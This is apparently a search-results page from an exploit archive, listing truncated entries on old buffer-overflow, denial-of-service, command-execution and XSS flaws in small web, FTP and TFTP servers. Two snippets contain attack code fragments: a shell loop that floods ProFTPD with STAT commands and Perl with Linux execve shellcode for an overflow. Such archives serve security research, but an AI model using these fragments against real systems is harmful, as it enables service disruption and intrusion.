449 matches found
Monkey HTTP Daemon 0.4/0.5/0.6 - Excessive POST Data Buffer Overflow
source: https://www.securityfocus.com/bid/7202/info Monkey HTTP Daemon is prone to a boundary condition error. This condition occurs when the server attempts to handle excessive HTTP POST data. Exploitation could allow a remote attacker to corrupt sensitive regions of memory with attacker-supplie...
PHPPing 0.1 - Remote Command Execution
source: https://www.securityfocus.com/bid/7030/info A vulnerability has been reported in PHPPing that may allow remote attackers to execute commands on vulnerable systems. The vulnerability exists in the index.php script file. Some variables are not properly...
EType EServ 1.9x - NNTP Remote Denial of Service
source: https://www.securityfocus.com/bid/6522/info EServ is a proxy software package distributed by EType. It is available for Microsoft Windows operating systems. It has been reported that a problem in EServ may cause the software to crash. When a remote user sends a large amount of data via...
prodos.sh
Hello, proftpd is vulnerable to denial of service similar to the list /..//..//../. !/bin/sh proftpd do this some more to make sure the system eventually dies cnt=25 while $cnt -gt 0 ; do ftp -n EOF& o $1 quote user $2 quote pass $3 quote stat /////// quit EOF let cnt=cnt-1 done sleep 2 killall -...
ProFTPd 1.2.x - STAT Denial of Service
source: https://www.securityfocus.com/bid/6341/info A denial of service vulnerability has been reported for ProFTPD. It is possible to prevent ProFTPD from responding to legitimate requests for service by issuing specially crafted STAT commands. This will resu...
zerooexploit.txt
According to the vendor's web page, Zeroo is a "simple, small, portable, fast HTTP server". The server is available for Windows, and Linux operating systems. A folder traversal flaw in the server may allow attackers to compromise sensitive information stored on the server's volume. !/usr/bin/per...
liteserve.txt
Christopher Fillion's "Perception" web site hosts the LiteServe combination server for Win32. The server offers HTTP, FTP, SMTP, POP3, and Telnet services. Included in the HTTP service is a Common Gateway Interface (CGI) feature that allows you to specify a CGI alias, as well as "filters" that are...
Lonerunner Zeroo HTTP Server 1.5 - Remote Buffer Overflow
source: https://www.securityfocus.com/bid/6190/info Zeroo HTTP server is a freely available, open source web server. It is available for the Linux and Microsoft Windows platforms. It has been reported that Zeroo HTTP server does not sufficiently check bounds on some requests. This occurs when a...
TFTP Server DoS
Product: TFTP Server 2002 Standard Edition Authors: SolarWinds www.SolarWinds.net Vulnerable versions: v.5.0.55 and below Vulnerability: buffer overflow Bug&exploit by D4rkGr3y www.dhgroup.org Overview: From TFTP Server help: "Many...
efstool.pl
!/usr/bin/perl Another efstool exploit $shell = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89". "\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89". "\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; $ret =0xbfffe590; $buf = 3000; $egg = 2000; $nop = "\x90"; $offset = 0; if @ARGV == 1 $offset = $ARGV0;...
602Pro LAN SUITE 2002 - Telnet Proxy localhost Denial of Service
source: https://www.securityfocus.com/bid/5416/info The 602Pro LAN SUITE 2002 Telnet Proxy is reported to be prone to a denial of service condition. It is possible for proxy users to use the loopback interface to connect to localhost. If a large number of these connections are made concurrently, ...
wbboard 1.1.1 Cross Site Scripting Vulnerability
Affected program : wbboard 1.1.1 is a phpBB-like PHP forum Vendor : http://www.woltlab.de/ Vulnerability-Class : Cross Site Scripting (CSS) OS specific : No Problem-Type : Joke severity : No risk SUMMARY 1. WBBoard allowed ...
Burning Board 1.1.1 - 'URL' Manipulation
source: https://www.securityfocus.com/bid/4512/info Burning Board is web forum software. It is written in PHP, back-ended by MySQL, and will run on most Unix and Linux variants as well as Microsoft Windows. An attacker may allegedly create a malicious link which is capable of causing actions to b...
Phusion WebServer 1.0 - Long URL Denial of Service
source: https://www.securityfocus.com/bid/4118/info Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. It is possible for a remote attacker to deny service to legitimate users of the service by submitting an excessively long web request...
bru backup program
Product: Bru Description: BRU provides fully verified backup and restore operations and offers options for most conceivable data backup and recovery needs. BRU is fully device independent, so it works with any device or filesystem that is supported by your operating system...
Cyberstop Web Server 0.1 - Long Request Denial of Service
source: https://www.securityfocus.com/bid/3930/info Cyberstop is a web server for Windows 9x/NT/2000 systems. Attacks can be launched on a Cyberstop host if a request is submitted containing an unusual number of arbitrary characters...
Microsoft IIS/5.0 Content-Length DoS (proved)
Well, finally I have done testing about and I have made a 1gb RAM server to get Out Of Virtual Memory and basically unusable with one script that uses the flaw exposed on the other mails. I suppose that now it's a real security bug. Thanks Ivan Hernandez...
Cooolsoft PowerFTP Server 2.0 32.10 - Multiple Denial of Service Vulnerabilities (2)
source: https://www.securityfocus.com/bid/3595/info PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft. Multiple instances of denial of servi...